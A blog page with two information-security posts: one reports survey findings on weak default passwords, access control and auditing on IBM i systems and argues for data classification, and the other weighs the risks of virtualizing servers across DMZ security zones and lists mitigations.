I definitely think that information security is more about strategy and senior management commitment than about approaching it from technology requirements. That is why I would definitely start by reviewing and updating the Tier 1 policies and having them signed off again.

Wednesday 3 February 2010

IBM i security

IBM i is the operating system (formerly known as i5/OS or OS/400) that runs on System i hardware (formerly known as iSeries and AS/400). System i was IBM's mid-range line of computer systems. IBM now offers IBM i on its new range of computer systems: Power Systems.

IBM i is used in many industries and generally hosts an organisation's critical data and applications. Given the classification of the data stored and processed on these systems, ensuring a high level of security is paramount.

Mid-range computer systems and mainframes have gained a reputation for being very secure. They are known to be secure by design (compared with Windows and Unix operating systems). This belief is generally shared among IT professionals and auditors. However, few security professionals and auditors are familiar with these systems, and a comprehensive assessment of them may be overlooked.

The company Powertech surveyed around 200 System i servers (many at Fortune 100 companies). The results are striking. Looking at this report, it seems obvious that the security of these systems should be getting more attention:

  • Almost 10% of enabled user profiles have default passwords. Over half the systems in the study have more than 15 user profiles with default passwords.
  • Too many users have high privileges over the operating system
  • Weak password policies
  • Lack of adequate controls over data: at the object level (platform and database layers), the majority of users have access to any data, breaching the need-to-know and separation-of-duties principles.
  • 65% of the surveyed systems have no logical access control over network access. Combined with the object-level issue described above, virtually any user can extract or modify data in database tables without any audit logs or restrictions. No need to be a wizard: a simple FTP client or the Excel add-in shipped with the IBM client software will get the data for you.
  • 18% of the systems have no auditing features activated at all.

What is really interesting is that the vulnerabilities highlighted here are very basic: trivial passwords, generic accounts, weak access control, lack of logging and monitoring, unhardened security settings, etc. All the recipes that are now mature on micro-computers should also be applied to IBM i.

Network access control and auditing

Historically, the only way to access these systems was a dumb terminal. Access control was done by restricting the user's menu on the terminal. There were not many paths to the database or platform (operating system) layers, so there was no real need to apply a consistent object-level access control policy; the only way of accessing the data was through the menu.

With TCP/IP and network connectivity, there are many more points of entry to the data. Ensuring the effectiveness of these controls is obviously more challenging. 

Importance of data classification policies

One of the conclusions that can be reached from this report is that most organisations are obviously breaching their own security policies when it comes to the security of their IBM i systems. I believe that almost all Fortune 100 companies have information security policies. They just forgot to enforce them on their most critical systems!

This highlights the importance of having sound data classification policies (ISO/IEC 27002 7.2.1 - CobiT PO2.3). The results of this study clearly show that an inappropriate security level is applied to many of the IBM i systems assessed during the survey; I assume they process critical data. Implementing a classification and handling policy forces the company to identify where its critical data is, so it is less likely that an information system is overlooked by security professionals, and it helps auditors define their risk-based audit strategy.

Regardless of the technology used (mid-range computers, mainframes, micro-computers), the level of security has to be proportionate to the value of the data being protected. Most companies have patch management procedures, hardening guides and vulnerability management programs, but surprisingly, these often don't apply to mid-range systems and mainframes.


  • The survey can be downloaded from the Powertech website
  • I also strongly suggest that you read John Earl's article on auditing iSeries systems, published in the ISACA Journal
  • IBM i Market

Friday 18 September 2009

Virtual server deployment spanning security zones

Following a question on the CISSP mailing list about the risks of virtual server deployments spanning security zones, here is the answer I posted:

VMware has released a best-practice guide on DMZ virtualization. I don't know if your project uses VMware, but I suppose most of this document remains valuable even with other virtualization tools.


Basically, I think that any option can offer the same level of security, but each involves different skills and amounts of work to mitigate the potential vulnerabilities.

In the second and third options of the document, guest systems from different DMZs are hosted on the same host server. These options can create vulnerabilities, mainly because the increased complexity can lead to misconfiguration. There are also separation-of-duties issues, since the VMware administrator can modify virtual network settings.

The points above can be mitigated, but doing so involves more requirements than the solution with physical separation of trust zones.

With DMZ virtualization, it is even more important that the following is done, and how much work this represents depends heavily on the maturity of information security and IT in general in each organisation:

  • The relevant IT people should be well trained on the virtualization tool the company uses
  • The VMware systems have to be hardened following best practices; management interfaces should be connected to a separate network that is only available to the relevant people
  • VMware patches have to be applied in a timely manner (this can be an issue, since all guest systems may need a reboot)
  • Regular configuration audits have to be performed to ensure that no misconfiguration has been introduced
  • Stringent change management must be in place in the organisation and no change to the virtual infrastructure should be done outside the change process

Virtualization is far from being a new toy. This is a great technology that can decrease costs and enable great DR strategies. It is likely to be a sensitive subject in every organisation, and the results of the risk analysis should be well detailed. I think the points above can be used in doing that risk analysis. For example, in a company with undersized IT teams and a poor change management process, I wouldn't recommend the DMZ virtualization option (depending on the impact, obviously).
